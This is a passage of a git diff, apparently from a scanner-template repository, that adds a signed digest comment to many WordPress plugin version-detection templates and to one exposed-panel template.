1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/exposed-panels/endpoint-protector-panel.yaml b/http/exposed-panels/endpoint-protector-panel.yaml index 404873b41f..be4306f423 100644 --- a/http/exposed-panels/endpoint-protector-panel.yaml +++ b/http/exposed-panels/endpoint-protector-panel.yaml @@ -26,3 +26,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..4b64246160 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d10cf69c3dee5912f7378c7fc7380fb343866ff57c195c08a9fb672a56f8d9ed02206ec172f8991f4281091a9a9715a442bcd92521297542f15d17b43000f2a5af7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..4cf686a540 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022047b381d0c59dc7a3997f3438daebfead565eb8d313cf02a7589bb5e33da2823e022100ec4e854b627fa1f562beb3e66e2d7ea9d947e077761e187cff1b8140c600f206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..8c6228404a 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085a4dad8ccd1fd635c9ef0600cce0d410514902316c4af289ff261c6b295ec0b022100b7cfffec498aeea1cc1a6ddfbc9d8709b5a0c3c2b433705ba3a7f88e5be6f2ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..e12d992bcc 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba955bfb6c7ed350c946ff06c5d1eb876997dc52eb2a961154c72c4c938c9d44022073d64c2604c42dd0921e40b88af78aa517210c958b22a04f251bd68014d145f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..0f976fb886 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d79f747c9d09c26fb1d324f7c534b4bb2b2ca80635bc03b86800b42d7f88fb4022100b9542f468531a8eeacb0806d25a109612935101033c532f07b0499a20e3e586b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..e25a5b8f77 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc2e9fc806ef996a9fb928ccc50d83347f0c42542417147a265c88d1a05ddf7a022100f5ccfb0d09244ceb16f3866e4f29d9e4fd8dd4f066c9f9a71a7ecc06001ed141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..ef7206bf13 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204755b2020641a9875f8181a3bc92fdab8e66ca5766ca030cac3aebd6f7912b9d02210084e3840ab04a3f73d8c65e94d11372a07ba9858a2d3f5034643d0448cb5e7562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..564360fc8e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022060b018d8390bef628dd15e504af567e07763406d337a070f68631dd4732f5340022100e0c3b60481eb69de36be6f6b66fc17315dd30bd7821b024dbc953aa704b7ad39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..f96cf38a8c 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c18330a236c8bc3dd7a6d15b2dc90ef5d852ca209b28751f9d6527c8bbe1929c022100f6d9949dbeb133f13d8915cdaf60ca809cca6d0d55505713b0b4a912dd0ca0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..7b0707ac68 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008dcadedb303a47ef4be55b7c98ba72906c0a1128d398ffc77793143ac0f9a64f02207df73cd57c210ad68d3773be0630fc569dda3b2eb408d43f7807c553a333615d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..3451e1c20c 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100babba5667c802615c0a6831df9989614f98cbd1c2cbc12ce7f5dc12323c9ef32022100f63fdff583bdc525bd905e399205ec9e59dd9b8303df48789244286c9aa9806f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..a44477e393 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc2e3aac5a545e24ea481689aa5d6b596485a7948e3d75ec26be47ddd1e8871502207e7901b143273e73611a8ea19807f02f4c98f0e37b1eaf3887f781a7f95e58f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..f94bca3a7c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220556b0f8362eabc6cd16c6729ef444eacf70336ebd4b0c86de628666603f65bb702205c581b4335316a2b0fda0388c9ef9a68363117d557ccbb59489564c0cfb84855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..1bc04d395b 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206eb705b1c62f0921e2b5b7d8eb6c4648713e20d5cd34d07b3eeba8e646daf4cc02203d3d3246a9e00f040948cd7811828ce114d829579dfa713addbc6906fa6110e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..e843872950 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c98d299ad1d45e385fc0b2189b239407f904f933cb5133be25a1cb31f2ceb6e022100bcbcf82f6eeaebdc13aec5df91a6ba5e10410cd03a8f83eaafb265b633b24a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..264e4651d2 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b912809bb1b8322f6a8214838eb599abc296a5347535c33215539b0ea1ce7a2c022100b14200b1fb7a0089f94830ea0c0e7ddfd6e83d82f92a311e4fd20675f5a31669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..a212c2e8e0 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d6d4a5c48462d21f08cbe7d72fa82aa0a192cd9430fc718a5d62bf40be42dee022100e64a042fcece052173be1f0386c1dee5b6275fefcc9f9c3052ad299074eaf3fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..d6e9c2ac98 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd1325549815a79744c8bbf2cebfd6a4b887910c8239b2ef8d2c6e7ccc80c697022100c13a9c2290c60c7ba3a6320f82012b3f61f853fb07bda275439b0c87c311cbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..f5e18cdb12 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b807d1b4189ea81419b5c342ee2df0dde8c1fd44e6b437fce35fcddcd3de14f8022100de8971490178dec66d2b360d1fc23887604129a6bade74fa2d036a9ca6548619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..8ce1d7f14d 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002a15f0769987b4bf9a35fad58868c9e9caad9233cfd889732e3b40e039006f3022100b46eae88b205d1bf9557d8025cceab130e325a7b2426203b0f1e2963a4d459ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..a4ac534680 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa2665d1250de05a27994b88070d5aaeba08925821739f9a121cf37cb63a873a02201ed4998598265dd6f08c78c280457ad2ee10e1bca445f5a41cc9e87a07f8de77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..b081eab8c9 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204753bee5193dc065ab267d031ac054b31317269474782dd5c0360ecdcad9fcf30221009b53759a934d95706eaad11416ea1f12dc8918a9c5588279932ed26eed558416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..f04c2dc81f 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d464f0f1cace72ac8b9012705e883eb6053d1d989c534eb229a24d6c4bd0164e022100cc2e0bcb51b123d904de9603b10a963c6b75bc232849123e31bc7db3d201f867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..c225c58c4c 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e00fa10db61c46e1a1ff3ae226def6a203fc69b9ecd972661cac1a8acd8ff54f02201e867d26c9b1266753717cebf0f855ca1b0989c65cc5c209db626c029abf42c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..8e9255e7ca 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d45ea205d0c56582b150d7fac04b3d8a2d610cbbb9d54debda925cc482d7ff7a02200177c5c652c10f2ac24eec892e152b00845d6b88b403cda0f365ccb6b951843d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..86e28e22db 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e3d0eba25e14e330a0e39c21068f87c72c09dce2161c655de60fe33fd4a088900220452a100a22e2785017fa27f159a052a2dad5e002713732c20398be51abba893e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..8b290957aa 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ea556c92114c4a85d544ac00da5618104006580e7332d58aab91f5cc997d57ab02206864a12b365698b05b4e3047aa864862b96080a5e382ab9e18c5a54c6ea89f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..944ba3801f 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d50163e8f3f2d90ebe582b1eb33c4e3f66d6f91e7b5948acf2d35bbb95794e65022100ddfb2cf079e25789a3edd73f9a541170c3b405d680af8dc8692a8ea584b04130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..cf6832b727 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb62dcec58eeefaaddf1079d807e45e65b86dcd4ab4d0fea4dc3180203c5252502200596fcd3b331ffa5bf23cc926524853c6d49b8affc0baa699d7b34b58f316289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..34ec2276d7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207976d3d840ef78a47264ed2e9f097ca63f0efc122f1b4b2cd73481f656d69d860221009c37484a1dcf1a90be0ecf673fa3156232ebf65d1363f1a7da3115d22ccad00a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..76c66b6c33 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206684117bcfceab307eb98330c853435152c20a846e989d2111f1c75a42c48b11022013798530b92fc4b6550b1579b7195237e8eb464b5b5670b97e843669a202e00a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..e245cf5016 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100967356fb10ef28286708a70ea558d12036e84fd6dd9ff7eacf6e04105f94be410221008d29b99d999006a633565fed1109177de81b6012dbd11487ae16180c21dcb454:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..4f114fe6dd 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203dee8250721325316b2563501d19f8ee15eebce1ac3f27a9a5feb85a855c3e400221009acb79da7a0ca223be061394ee917a506c292ff5db651c1f87e11dd529411342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..a0e0d045a7 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 